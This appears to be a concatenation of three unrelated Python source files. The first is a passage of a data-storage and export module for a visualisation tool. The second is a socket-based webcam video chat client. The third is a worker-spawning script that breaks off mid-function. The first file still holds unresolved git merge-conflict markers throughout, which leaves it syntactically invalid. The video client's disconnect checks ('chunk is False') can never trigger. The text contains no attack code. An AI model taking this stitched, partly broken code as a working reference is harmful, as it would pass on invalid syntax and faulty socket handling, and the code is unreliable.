config =r["configinstance"]
pp = data["points"]
#print(pp)
X, y, z = [],[],{}
for p in pp:
X.append([p["x"], p["y"]])
y.append(p["t"])
z[p["t"]]=1
si = Metrics.compute_silhoute(X,y,len(z));
config["silhouette"] = si;
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, {"configinstance":config})
return si;
@staticmethod
<<<<<<< HEAD
def export2dproj(app,selft):
idin = app.argms["file"]
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
=======
def makeInstancesLabels(app):
idin = Query.converid(app.argms["file"])
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
#print("RE", re)
for r in re:
config = {}
if "configinstance" in r:
config = r["configinstance"]
config["idinstanceslabels"] = app.argms["idinstanceslabels"];
dataup = {"configinstance":config};
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, dataup)
config = {}
if "configfeature" in r:
config = r["configfeature"]
config["idinstanceslabels"] = app.argms["idinstanceslabels"];
dataup = {"configfeature":config};
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, dataup)
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
#print("REu", app.argms["colname"], re)
df = pd.read_csv( Settings.DATA_PATH+str(idin)+"/original.csv",
delimiter=",",
usecols=[app.argms["idinstanceslabels"]])
#rest = {}
#rest["instanceslabels"] = [ str(df[app.argms["colname"]][ind]) for ind in df.index]
#rest["idinstanceslabels"] = [ str(row[0]) for row in df.itertuples(index=False) ]
rest = [ str(row[0]) for row in df.itertuples(index=False) ]
#print (rest)
del df
del re
return rest;
"""
@staticmethod
def export2dproj(app,selft):
idin = Query.converid(app.argms["file"])
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
export = ""
name = ""
for r in re:
name = r["name"]
if "typeinstance" in r and r["typeinstance"]=="projection":
<<<<<<< HEAD
filen = Settings.DATA_PATH+app.argms["file"]+"/instance.obj"
=======
filen = Settings.DATA_PATH+str(idin)+"/instance.obj"
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
if os.path.exists(filen):
data = {}
try:
infil = open(filen, "r")
data = ujson.load(infil)
infil.close()
except:
print("Something went wrong")
data = {}
# finally:
# data = {}
if "points" in data:
pp = data["points"]
export = "DY\n"
export += str(len(pp))+"\n"
export += "2\n"
export += "x;y\n"
for p in pp:
export += "{};{:.6f};{:.6f};{:.1f}\n".format(p["id"],p["x"], p["y"], p["t"])
selft.set_header('Content-Type', 'text/plain')
selft.set_header("Content-Disposition", "attachment; filename=%s" % name+".prj")
return export;
<<<<<<< HEAD
=======
"""
@staticmethod
def opendataset(app):
idin = Query.converid(app.argms["file"])
colle = app.argms["data"]["collect"]
query = app.argms["data"]["query"]
statusval, statusval = 0, ""
rf = []
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
rs = {};
for r in re:
if "statusopt" in r and "statusval" in r:
statusopt, statusval = r["statusopt"], r["statusval"]
else:
DBX.update( DBS.DBGFF,"data",
{"_id": idin},
{"statusopt": 0, "statusval": ""})
statusopt, statusval = 0, ""
if statusopt==0:
r["_id"] = str(r["_id"])
r["_id_user"] = str(r["_id_user"])
rs = r
rs["fenames"] = Query.loadatributenames(app)
rs["lastversion"] = Settings.VERSION
if colle=="features":
# open features
filen = Settings.DATA_PATH+str(idin)+"/feature.obj"
rs["layoutfeature"] = DBFile.openFile(filen)
elif colle=="instances":
# open instances
filen = Settings.DATA_PATH+str(idin)+"/instance.obj"
rs["layoutinstance"] = DBFile.openFile(filen)
#filter
for qrow in query:
aux = rs
for k in qrow:
if k in aux:
aux = aux[k]
else:
aux = {}
break;
rf.append({"query":qrow, "response":aux})
return {"statusopt": statusopt, "statusval": statusval, "response":rf}
"""
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
@staticmethod
def openfeature(app):
idin = app.argms["file"]
cols = Query.loadatributenames(app.argms)
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
rs = {};
for r in re:
r["_id"] = str(r["_id"])
r["_id_user"] = str(r["_id_user"])
rs = r
rs["fenames"] = cols
rs["lastversion"] = Settings.VERSION
<<<<<<< HEAD
filen = Settings.DATA_PATH+app.argms["file"]+"/feature.obj"
=======
filen = Settings.DATA_PATH+str(idin)+"/feature.obj"
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
dfile = {}
if os.path.exists(filen):
try:
infil = open(filen, "r")
dfile = ujson.load(infil)
infil.close()
except:
print("Something went wrong")
dfile = {}
rs["layoutfeature"] = dfile
return rs;
@staticmethod
def openinstance(app):
idin = app.argms["file"]
#cols = Query.loadatributenames(app.argms)
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
rs = {};
for r in re:
r["_id"] = str(r["_id"])
r["_id_user"] = str(r["_id_user"])
rs = r
#rs["fenames"] = cols
rs["lastversion"] = Settings.VERSION
<<<<<<< HEAD
filen = Settings.DATA_PATH+app.argms["file"]+"/instance.obj"
=======
filen = Settings.DATA_PATH+str(idin)+"/instance.obj"
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
dfile = {}
if os.path.exists(filen):
try:
infil = open(filen, "r")
dfile = ujson.load(infil)
infil.close()
except:
print("Something went wrong")
dfile = {}
rs["layoutinstance"] = dfile
return rs;
<<<<<<< HEAD
@staticmethod
def exportfeat2datafile(app, selft):
idin = app.argms["file"]
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
filename = Settings.DATA_PATH+idin+"/transform.csv"
=======
"""
@staticmethod
def exportfeat2datafile(app, selft):
idin = Query.converid(app.argms["file"])
filename = Settings.DATA_PATH+str(idin)+"/transform.csv"
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
export = ""
name = ""
for r in re:
name = r["name"]
<<<<<<< HEAD
=======
fnames = Query.loadatributenames(app);
fnamesindex ={ str(fnames[i]):i for i in range(len(fnames))}
layoutfeature = DBFile.openFile(Settings.DATA_PATH+str(idin)+"/feature.obj")
#print("layoutfeature", layoutfeature)
nodes = layoutfeature["graph"]["nodes"]
#print("nodes", nodes, fnamesindex, fnames)
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
X = DataMatrix(filename)
columns = X.columns()
colsindexes = X.columnsindexes()
XT = X.transpose()
del X
<<<<<<< HEAD
export = "DY\n"
export += str(XT.rows())+"\n"
export += str(XT.cols())+"\n"
nfecol = ["att"+str(i) for i in range(XT.cols()) ]
export += ";".join(nfecol)+"\n"
for i in range(XT.rows()):
=======
#print("fnames", fnames )
#print("nodesXX", fnamesindex )
export = "DY\n"
export += str(len(nodes))+"\n"
export += str(XT.cols())+"\n"
nfecol = ["fe"+str(i) for i in range(XT.cols()) ]
export += ";".join(nfecol)+"\n"
for nod in nodes:
i = fnamesindex[nod["label"]]
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
row = [str(columns[i])]
for j in range(XT.cols()):
row.append(str(XT.getValue(i,j)))
export += ";".join(row)
export += ";"+str(0.0)+"\n"
del XT
<<<<<<< HEAD
=======
del fnamesindex
del layoutfeature
del nodes
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
#target_id = X.columnindex(target)
#print(export)
selft.set_header('Content-Type', 'text/plain')
selft.set_header("Content-Disposition", "attachment; filename=%s" % name+".data")
return export;
<<<<<<< HEAD
=======
@staticmethod
def now():
return datetime.now().strftime("%Y-%m-%d %H:%M:%S")
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
class DataTransfer:
<<<<<<< HEAD
def __init__(self):
self.argms = {}
self.layoutfeature = {}
self.layoutinstance = {}
=======
def __init__(self, data):
self.argms = {}
self.load(ujson.loads(data))
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
def load(self, data):
for k in self.__dict__:
if k in data:
setattr( self, k, (data[k]) )
<<<<<<< HEAD
=======
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
"""
Database X
"""
class DBX:
@staticmethod
def find(dbs, collect, rdata):
rest = []
if Settings.MULIUSER == 0:
rest = DBFile.find(DBS.DBGFF, "data", rdata)
elif Settings.MULIUSER == 1:
rest = MongoDB.find(DBS.DBGFF, "data", rdata)
return rest
@staticmethod
def insert(dbs, collect, rdata):
rest = []
if Settings.MULIUSER == 0:
rest = DBFile.insert(dbs, collect, rdata)
elif Settings.MULIUSER == 1:
rest = MongoDB.insert(dbs, collect, rdata)
return rest
@staticmethod
def update(dbs, collect, queryid, rdata):
if Settings.MULIUSER == 0:
DBFile.update(dbs, collect, queryid, rdata)
elif Settings.MULIUSER == 1:
MongoDB.update(dbs, collect, queryid, rdata)
@staticmethod
def delete(dbs, collect, queryid):
if Settings.MULIUSER == 0:
DBFile.delete(dbs, collect, queryid)
elif Settings.MULIUSER == 1:
MongoDB.delete(dbs, collect, queryid)
"""
Database from file
"""
class DBFile:
@staticmethod
def openFile(pathf):
dfile = {}
<<<<<<< HEAD
with open(pathf,'r') as fp:
dfile = ujson.load(fp)
=======
try:
with open(pathf,'r') as fp:
dfile = ujson.load(fp)
except:
dfile = {}
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
return dfile
@staticmethod
def writeFile(pathf, rdata):
with open(pathf,'w') as fp:
ujson.dump(rdata, fp)
@staticmethod
def find(dbs, collect, rdata):
# print("rdata", rdata)
rdata["_id"] = str(rdata["_id"])
rest = []
f = Settings.DATA_PATH+rdata["_id"]+"/"+collect+".obj"
if os.path.isfile(f):
rest = [DBFile.openFile(f)]
return rest
@staticmethod
def insert(dbs, collect, rdata):
idud = DBFile.uid()
rdata["_id"] = idud
<<<<<<< HEAD
if not os.path.exists(Settings.DATA_PATH+idud):
os.makedirs(Settings.DATA_PATH+idud)
DBFile.writeFile(Settings.DATA_PATH+idud+"/"+collect+".obj", rdata)
=======
ndir = Settings.DATA_PATH+idud
Query.makedir(ndir)
DBFile.writeFile(ndir+"/"+collect+".obj", rdata)
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
return idud
@staticmethod
def update(dbs, collect, queryid, rdata):
queryid["_id"] = str(queryid["_id"])
db = DBFile.openFile(Settings.DATA_PATH+queryid["_id"]+"/"+collect+".obj")
for k, v in rdata.items():
db[k] = v
DBFile.writeFile(Settings.DATA_PATH+queryid["_id"]+"/"+collect+".obj", db)
@staticmethod
def uid():
return uuid.uuid4().hex
|
socket_client_video.py | #v0.9 - Alpha 1
#v0.8
#import socket, videosocket
import socket
import errno
from threading import Thread, Event
from videofeed import VideoFeed
from cv2 import cv2
import logging
import numpy as np
import zlib
HEADER_LENGTH = 10
NP_ROW_CHARS_SIZE = 4
NP_COL_CHARS_SIZE = 4
NP_DIM_CHARS_SIZE = 4
client_socket_video_send = None
client_socket_video_recv = None
#vsock = None
thread_send_video = None
thread_listen_video = None
pill_to_kill_send_thread = None
pill_to_kill_listen_thread = None
stop_connection = False
videofeed = None
self_username = ''
window_list = []
#currently this is getting called from ConnectPage.
# But i think this needs to get called from 'Start Video' button. Will need to check this logic
# Connects to the server
def connect(ip, port, my_username, error_callback):
global client_socket_video_send
global client_socket_video_recv
#global vsock
global videofeed
global self_username
global pill_to_kill_send_thread
global pill_to_kill_listen_thread
global stop_connection
# Create a socket
# socket.AF_INET - address family, IPv4, some otehr possible are AF_INET6, AF_BLUETOOTH, AF_UNIX
# socket.SOCK_STREAM - TCP, conection-based, socket.SOCK_DGRAM - UDP, connectionless, datagrams, socket.SOCK_RAW - raw IP packets
stop_connection = False
try:
client_socket_video_send = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to a given ip and port
client_socket_video_send.connect((ip, port))
#vsock = videosocket.videosocket (client_socket_video_send)
except Exception as e:
# Connection error
#error_callback('Connection error: {}'.format(str(e)), False)
close_connection()
return -1
# Prepare username and header and send them
# We need to encode username to bytes, then count number of bytes and prepare header of fixed size, that we encode to bytes as well
try:
self_username = my_username
username = my_username.encode('utf-8')
keyword = 'SEND_SOCKET'.encode('utf-8')
sep_bytes = ':'.encode('utf-8')
username_header = f"{len(keyword+sep_bytes+username):<{HEADER_LENGTH}}".encode('utf-8')
#print('before client_socket_video_send.send(username_header + username)')
ret = client_socket_video_send.send(username_header + keyword+sep_bytes+username)
if(ret <= 0):
close_connection()
return -2
#print('after client_socket_video_send.send(username_header + username)')
except Exception as e:
# Connection error
#error_callback('Connection error: {}'.format(str(e)), False)
close_connection()
return -2
try:
client_socket_video_recv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to a given ip and port
client_socket_video_recv.connect((ip, port))
#vsock = videosocket.videosocket (client_socket_video_send)
except Exception as e:
# Connection error
#error_callback('Connection error: {}'.format(str(e)), False)
close_connection()
return -1
# Prepare username and header and send them
# We need to encode username to bytes, then count number of bytes and prepare header of fixed size, that we encode to bytes as well
try:
keyword = 'READ_SOCKET'.encode('utf-8')
username_header = f"{len(keyword+sep_bytes+username):<{HEADER_LENGTH}}".encode('utf-8')
#print('before client_socket_video_send.send(username_header + username)')
ret = client_socket_video_recv.send(username_header + keyword+sep_bytes+username)
if(ret <= 0):
close_connection()
return -2
#print('after client_socket_video_send.send(username_header + username)')
except Exception as e:
# Connection error
#error_callback('Connection error: {}'.format(str(e)), False)
close_connection()
return -2
try:
videofeed = VideoFeed(1,my_username,1)
if not (videofeed.capture.isOpened()):
videofeed = None
print('Can not open self capture camera')
pill_to_kill_listen_thread = Event()
return -3
except Exception as e:
# Connection error
#error_callback('Connection error: {}'.format(str(e)), False)
return -3
pill_to_kill_listen_thread = Event()
pill_to_kill_send_thread = Event()
return 1
# Sends a message to the server - used to send DATA or CLOSING message
def send(message, header_size=HEADER_LENGTH):
# Encode message to bytes, prepare header and convert to bytes, like for username above, then send
message = message.encode('utf-8')
message_header = f"{len(message):<{header_size}}".encode('utf-8')
to_send = message_header + message
send_size = len(to_send)
tot_sent = 0
while tot_sent < send_size:
ret = client_socket_video_send.send(to_send[tot_sent:send_size])
tot_sent += ret
#client_socket_video_send.send(message_header + message)
def send_frame(message, frame_bytes, header_size=HEADER_LENGTH):
# Encode message to bytes, prepare header and convert to bytes, like for username above, then send
message = message.encode('utf-8')
message_header = f"{len(message+frame_bytes):<{header_size}}".encode('utf-8')
to_send = message_header + message + frame_bytes
send_size = len(to_send)
tot_sent = 0
while tot_sent < send_size:
ret = client_socket_video_send.send(to_send[tot_sent:send_size])
tot_sent += ret
def receive_message(receive_size=HEADER_LENGTH):
try:
# Receive our "header" containing message length, it's size is defined and constant
#message_header = client_socket.recv(receive_size)
message_header = ''.encode('utf-8')
totrec = 0
while totrec<receive_size :
chunk = client_socket_video_recv.recv(receive_size - totrec)
#if chunk == '':
if chunk is False:
print("In receive_message: received 0 bytes during receive of data size.")
#raise RuntimeError("Socket connection broken")
#break
return False
totrec += len(chunk)
message_header = message_header + chunk
# If we received no data, client gracefully closed a connection, for example using socket.close() or socket.shutdown(socket.SHUT_RDWR)
if not len(message_header):
return False
# Convert header to int value
message_length = int(message_header.decode('utf-8').strip())
message_data = ''.encode('utf-8')
totrec = 0
while totrec<message_length :
chunk = client_socket_video_recv.recv(message_length - totrec)
#if chunk == '':
if chunk is False:
print("In receive_message: received 0 bytes during receive of data.")
#raise RuntimeError("Socket connection broken")
#break
return False
totrec += len(chunk)
message_data = message_data + chunk
if not len(message_data):
return False
# Return an object of message header and message data
#return {'header': message_header, 'data': client_socket.recv(message_length)}
return {'header': message_header, 'data': message_data}
except:
# If we are here, client closed connection violently, for example by pressing ctrl+c on his script
# or just lost his connection
# socket.close() also invokes socket.shutdown(socket.SHUT_RDWR) what sends information about closing the socket (shutdown read/write)
# and that's also a cause when we receive an empty message
return False
def close_connection():
global client_socket_video_send
global client_socket_video_recv
global videofeed
stop_video_comm()
if( client_socket_video_send != None ):
client_socket_video_send.close()
if( client_socket_video_recv != None ):
client_socket_video_recv.close()
#videofeed = None
client_socket_video_send = None
client_socket_video_recv = None
def stop_video_comm():
global stop_connection
stop_connection = True
#wait for the send thread to close
try:
while((thread_send_video !=None) and (thread_send_video.is_alive())):
print('waiting for send thread to become None')
except Exception as e:
print('stopped send thread')
print('video send thread stopped')
if((videofeed != None) and (videofeed.capture.isOpened())):
videofeed.capture.release()
cv2.destroyWindow(self_username)
#send CLOSING
if( client_socket_video_send != None ):
send('CLOSING')
try:
while((thread_listen_video != None) and (thread_listen_video.is_alive())):
print('waiting for listen thread to become None')
except Exception as e:
print('stopped listen thread')
print('video listen thread stopped')
#cv2.destroyAllWindows()
def start_sending_video(send_callback, error_callback):
global thread_send_video
if (videofeed.capture.isOpened()):
#print('before Thread send_video')
thread_send_video = Thread(target=send_video, args=(send_callback, error_callback), daemon=True)
thread_send_video.start()
#print('after Thread send_video')
def send_video(send_callback, error_callback):
#global vsock
global videofeed
global pill_to_kill_send_thread
#while True:
while not pill_to_kill_send_thread.wait(0):
try:
#ret = cv2.getWindowProperty(self_username, cv2.WND_PROP_VISIBLE)
#if(ret > 0):
"""x = cv2.waitKey(1)
if(x == 27):
cv2.destroyAllWindows()
break"""
frame=videofeed.get_frame()
videofeed.set_frame(frame)
#get_frame returns np.ndarray, change the np.ndarray to bytes and then send bytes
#we also need to send the shape of nparray so that it can be reconstructed in reveice
#if(client_socket_video_send != None):
"""shape_row_bytes = (str(frame.shape[0])).encode('utf-8')
message_header = f"{len(shape_row_bytes):<{NP_ROW_CHARS_SIZE}}".encode('utf-8')
client_socket_video_send.send(message_header + shape_row_bytes)
shape_col_bytes = (str(frame.shape[1])).encode('utf-8')
message_header = f"{len(shape_col_bytes):<{NP_COL_CHARS_SIZE}}".encode('utf-8')
client_socket_video_send.send(message_header + shape_col_bytes)
shape_dim_bytes = (str(frame.shape[2])).encode('utf-8')
message_header = f"{len(shape_dim_bytes):<{NP_DIM_CHARS_SIZE}}".encode('utf-8')
client_socket_video_send.send(message_header + shape_dim_bytes)"""
"""shape_str = f"{frame.shape[0]},{frame.shape[1]},{frame.shape[2]}"
send(shape_str, HEADER_LENGTH)"""
#shape_str_bytes = shape_str.encode('utf-8')
#message_header = f"{len(shape_str_bytes):<{HEADER_LENGTH}}".encode('utf-8')
#client_socket_video_send.send(message_header + shape_str_bytes)
#now send the entire nparray as bytes
send_bytes = frame.tobytes()
send_bytes = zlib.compress(send_bytes, -1)
#send_size = (frame.shape[0] * frame.shape[1] * frame.shape[2])
#compress the video bytes - 9 is max compression amd 1 is lowest compression, -1 is default (6)
#compressed_send_bytes = zlib.compress(send_bytes, 9)
#compressed_send_bytes = zlib.compress(send_bytes, -1)
#send_size = len(send_bytes)
#send_size = len(compressed_send_bytes)
#send(str(send_size))
#frame_size = f"{frame.shape[0]},{frame.shape[1]},{frame.shape[2]},{send_size}"
frame_size = f"{frame.shape[0]},{frame.shape[1]},{frame.shape[2]},"
#send(frame_size)
send('DATA')
send_frame(frame_size, send_bytes)
"""totalsent = 0
while totalsent < send_size :
#sent = client_socket_video_send.send(send_bytes)
sent = client_socket_video_send.send(compressed_send_bytes)
if sent == 0:
print("client_socket_video_send.send(send_bytes): During sending frame Socket connection broken. breaking the current send operation")
#raise RuntimeError("Socket connection broken")
break #this means we will exit the thread and sending will stop
totalsent += sent"""
videofeed.set_frame(frame)
if(stop_connection == True):
#print('before pill_to_kill_send_thread.set()')
pill_to_kill_send_thread.set()
#print('after pill_to_kill_send_thread.set()')
break
#else:
# cv2.destroyAllWindows()
# break
except Exception as e:
# Any other exception - something happened, exit
print('Falied in send_video. Stopping the send thread.: ' + str(e))
#cv2.destroyWindow(self_username)
#vsock = None
#videofeed = None
#client_socket_video_send.close()
#error_callback('Reading error: {}'.format(str(e)), False)
#break
#if we are out of while loop that means we are closing the socket. We need to tell the server and server
# will inform the other clients
#we will first send a braodcast message to let server know we are closing connection
#server in turn will notify all the clients that I am closing connection
#clients who receive the closing message in listner, will close that users video window
#and then they will continue to wait for a new message from server
#send('CLOSING')
print('Stopped send video thread')
#pill_to_kill_send_thread = None
# Starts listening function in a thread
# incoming_message_callback - callback to be called when new message arrives
# error_callback - callback to be called on error
#def start_listening(incoming_message_callback, error_callback):
def start_listening(listen_callback, error_callback):
global thread_listen_video
#print('before Thread listen')
thread_listen_video = Thread(target=listen, args=(listen_callback, error_callback), daemon=True)
thread_listen_video.start()
#print('after Thread listen')
# Listens for incomming messages
def listen(listen_callback, error_callback):
#global vsock
#global videofeed
global pill_to_kill_listen_thread
global pill_to_kill_send_thread
global window_list
#global thread_listen_video
#global thread_send_video
# Now we want to loop over received messages (there might be more than one) and print them
#while True:
while not pill_to_kill_listen_thread.wait(0):
try:
#while True:
#if((vsock != None) and (videofeed != None)):
#first get the username
# Receive our "header" containing username length, it's size is defined and constant
"""username_header = client_socket_video_send.recv(HEADER_LENGTH)
# If we received no data, server gracefully closed a connection, for example using socket.close() or socket.shutdown(socket.SHUT_RDWR)
if not len(username_header):
#error_callback('Connection closed by the server', False)
print('Connection closed by server: if not len(username_header):')
continue
# Convert header to int value
username_length = int(username_header.decode('utf-8').strip())
#print('after username_length: ' + str(username_length))
# Receive and decode username
username = client_socket_video_send.recv(username_length).decode('utf-8')
#print('client_socket_video_send.recv: username= ' + username)"""
username_dict = receive_message()
if(username_dict is False):
print('username_dict is False. continuing...')
continue
keyword_dict = receive_message()
if(keyword_dict is False):
print('keyword_dict is False. continuing...')
continue
username = (username_dict['data'].decode('utf-8')).strip()
"""keyword_header = client_socket_video_send.recv(HEADER_LENGTH)
if not len(keyword_header):
#error_callback('Connection closed by the server', False)
print('Connection closed by server in keyword_header = client_socket_video_send.recv(HEADER_LENGTH)')
continue
# Convert header to int value
keyword_length = int(keyword_header.decode('utf-8').strip())
keyworkd_message = client_socket_video_send.recv(keyword_length).decode('utf-8')"""
keyworkd_message = (keyword_dict['data'].decode('utf-8')).strip()
if(keyworkd_message.upper() == 'CLOSING'):
#we need to close the video window of the specific sender
#if(cv2.getWindowProperty(username + '_receiver', 0) == 0):
if (username + '_receiver') in window_list:
window_list.remove(username + '_receiver')
cv2.destroyWindow(username + '_receiver')
elif(keyworkd_message.upper() == 'ACK_CLOSED'):
for each_window in window_list:
cv2.destroyWindow(each_window)
window_list.clear()
pill_to_kill_listen_thread.set()
break
elif(keyworkd_message.upper() == 'DATA'):
#now get the share of nparray. shape is (row, cols, dim) ex. shape: (480, 640, 3)
#print('before client_socket_video_send.recv to get row')
"""shape_size_header = client_socket_video_send.recv(HEADER_LENGTH)
shape_size_length = int(shape_size_header.decode('utf-8').strip())
shape_size_str = client_socket_video_send.recv(shape_size_length).decode('utf-8')"""
shape_dict = receive_message()
if(shape_dict is False):
print('shape_dict is False. continuing...')
continue
#shape_size_str = (shape_dict['data'].decode('utf-8')).strip()
#shape_size_split = shape_size_str.split(',')
shape_size_split = shape_dict['data'].split(','.encode('utf-8'), 3)
shape_row_int = int(shape_size_split[0].decode('utf-8'))
shape_col_int = int(shape_size_split[1].decode('utf-8'))
shape_dim_int = int(shape_size_split[2].decode('utf-8'))
#message_size = int(shape_size_split[3])
frame = shape_size_split[3]
"""shape_row_header = client_socket_video_send.recv(NP_ROW_CHARS_SIZE)
shape_row_length = int(shape_row_header.decode('utf-8').strip())
shape_row_int = int(client_socket_video_send.recv(shape_row_length).decode('utf-8'))
#print('before client_socket_video_send.recv to get col')
shape_col_header = client_socket_video_send.recv(NP_COL_CHARS_SIZE)
shape_col_length = int(shape_col_header.decode('utf-8').strip())
shape_col_int = int(client_socket_video_send.recv(shape_col_length).decode('utf-8'))
#print('before client_socket_video_send.recv to get dim')
shape_dim_header = client_socket_video_send.recv(NP_DIM_CHARS_SIZE)
shape_dim_length = int(shape_dim_header.decode('utf-8').strip())
shape_dim_int = int(client_socket_video_send.recv(shape_dim_length).decode('utf-8'))
#print('after client_socket_video_send.recv to get dim')"""
#get the size of the bytes array
"""message_size_header = client_socket_video_send.recv(HEADER_LENGTH)
message_size_length = int(message_size_header.decode('utf-8').strip())
message_size = int(client_socket_video_send.recv(message_size_length).decode('utf-8'))"""
"""message_size_dict = receive_message(client_socket_video_send, HEADER_LENGTH)
if(message_size_dict is False):
print('message_size_dict is False. continuing...')
continue
message_size = int((message_size_dict['data'].decode('utf-8')).strip())"""
"""totrec = 0
frame = ''.encode('utf-8')
#message_size = shape_row_int*shape_col_int*shape_dim_int
while totrec<message_size :
chunk = client_socket_video_recv.recv(message_size - totrec)
if chunk == '':
print("client_socket_video_send.recv(message_size - totrec): During receiving frame socket connection broken, Breaking the current receive operation")
#raise RuntimeError("Socket connection broken")
break
totrec += len(chunk)
frame = frame + chunk"""
#print('after frame = vsock.vreceive()')
# we received bytes which we need to convert to np.ndarray
""" sample to convert nparray to bytes and bytes to nparray
In [3]: i = np.arange(28*28).reshape(28, 28)
In [4]: k = i.tobytes()
In [5]: y = np.frombuffer(k, dtype=i.dtype)
In [6]: y.shape
Out[6]: (784,)
In [7]: np.array_equal(y.reshape(28, 28), i)
Out[7]: True
dtype('uint8')
"""
if(len(frame) > 0):
#decompress the recived frame
frame = zlib.decompress(frame)
received_nparray = np.frombuffer(frame, dtype=np.uint8)
received_nparray = received_nparray.reshape(shape_row_int, shape_col_int, shape_dim_int)
#cv2.imshow(username + '_receiver', frame)
# Now create OpenCV window for this username if not already created
#if(cv2.getWindowProperty(username + '_receiver', 0) < 0):
#if( cv2.getWindowProperty(username + '_receiver',cv2.WND_PROP_VISIBLE) <= 0):
#print('cv2.getWindowProperty < 0')
#cv2.namedWindow(username + '_receiver', cv2.WINDOW_AUTOSIZE)
#print('after cv2.namedWindow(username + \'_receiver\'')
if (username + '_receiver') not in window_list:
window_list.append(username + '_receiver')
cv2.namedWindow(username + '_receiver', cv2.WINDOW_AUTOSIZE)
cv2.imshow(username + '_receiver', received_nparray)
x = cv2.waitKey(1)
#print('after cv2.imshow(username + \'_receiver\'')
except Exception as e:
# Any other exception - something happened, exit
print('Falied in listen :' + str(e))
#cv2.destroyWindow(self_username)
#vsock = None
#videofeed = None
#client_socket_video_send.close()
#error_callback('Reading error: {}'.format(str(e)), False)
#break
#since we are out of while, that means a 'CLOSING' message was received by a
pill_to_kill_listen_thread.set()
if(pill_to_kill_send_thread != None):
pill_to_kill_send_thread.set()
print('Stopped listen video thread')
|
run_workers.py | #!/usr/bin/env python3
'''
A script for running worker processes
Copyright 2012-2020 Codinuum Software Lab <https://codinuum.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import os
import sys
import subprocess
import threading
import select
import time
import logging
from .common import setup_logger
logger = logging.getLogger()
#####
TIMEOUT = 5
BUFSIZE = 0 # unbuffered
LOG_BUFSIZE = 256
#####
def spawn(cmd):
sproc = subprocess.Popen(cmd,
bufsize=BUFSIZE,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True)
return sproc
def mklogname(cmd_name, wid):
(base, ext) = os.path.splitext(cmd_name)
return 'log.worker.%s.%s' % (base, wid)
def dump_log(cmd_name, wid, sout_serr, wdir='.', timeout=TIMEOUT):
sout, serr = sout_serr
log = os.path.join(wdir, mklogname(cmd_name, wid))
f = open(log, 'wb')
running = True
outs = [sout, serr]
nouts = len(outs)
max_count = LOG_BUFSIZE
prev_out = None
out = None
count = 0
nclosed = 0
while running:
try:
(ready_outs, x0, x1) = select.select(outs, [], [], timeout)
n = len(ready_outs)
if prev_out:
if prev_out in ready_outs:
if count < max_count:
out = prev_out
count += 1
else:
if n > 1:
i = ready_outs.index(prev_out)
if i < n - 1:
out = ready_outs[i+1]
else:
out = ready_outs[0]
count = 0
else:
out = prev_out
elif n > 0:
out = ready_outs[0]
count = 0
else:
out = None
elif n > 0:
out = ready_outs[0]
count = 0
else:
out = None
prev_out = out
if out:
dat = out.read(1)
if dat:
f.write(dat)
else:
outs.remove(out)
nclosed += 1
if nclosed >= nouts:
running = False
logger.info('[wid:%s] finished.' % wid)
except BaseException as e:
logger.error('{}'.format(e))
break
f.close()
def store_carg(option, opt_str, value, parser):
setattr(parser.values, option.dest, getattr(parser.values, option.dest)+' '+value)
def main():
from optparse import OptionParser
usage = 'usage: %prog [OPTIONS] [TARGET_DIR]'
optparser = OptionParser(usage)
optparser.add_option('-c', '--cmd', dest='cmd',
help='set command to CMD', metavar='CMD')
optparser.add_option('-a', '--arg', action='callback', callback=store_carg, nargs=1,
dest='cargs', type='string', default='',
help='set ARGS for sub command', metavar='ARGS')
optparser.add_option('-n', '--nprocs', dest='nprocs', action='store', type='int',
help='set nprocs to N', metavar='N', default=2)
optparser.add_option('-d', '--debug', action='store_true', dest='debug',
help='enable debug output')
(opt, args) = optparser.parse_args()
log_level = logging.INFO
if opt.debug:
log_level = logging.DEBUG
setup_logger(logger, log_level)
target_dir = '.'
if args:
target_dir = args[0]
dist_dir = os.path.dirname(sys.argv[0])
logger.info('command: "%s"' % opt.cmd)
w_cmd = ''
if opt.cmd:
w_cmd = os.path.join(dist_dir, opt.cmd)
else:
logger.error('no command specified')
out_tbl = {}
for i in range(opt.nprocs):
wid = str(i)
logger.info('worker id: %s' % wid)
if w_cmd:
arg = ''
if opt.cargs:
arg = opt.cargs
engine_opt = ''
# if opt.engine:
# engine_opt = '-e %s' % opt.engine
cmd = '%s %s -c work -w %s %s %s' % (w_cmd, arg, wid, engine_opt, target_dir)
logger.info('cmd: "%s"' % cmd)
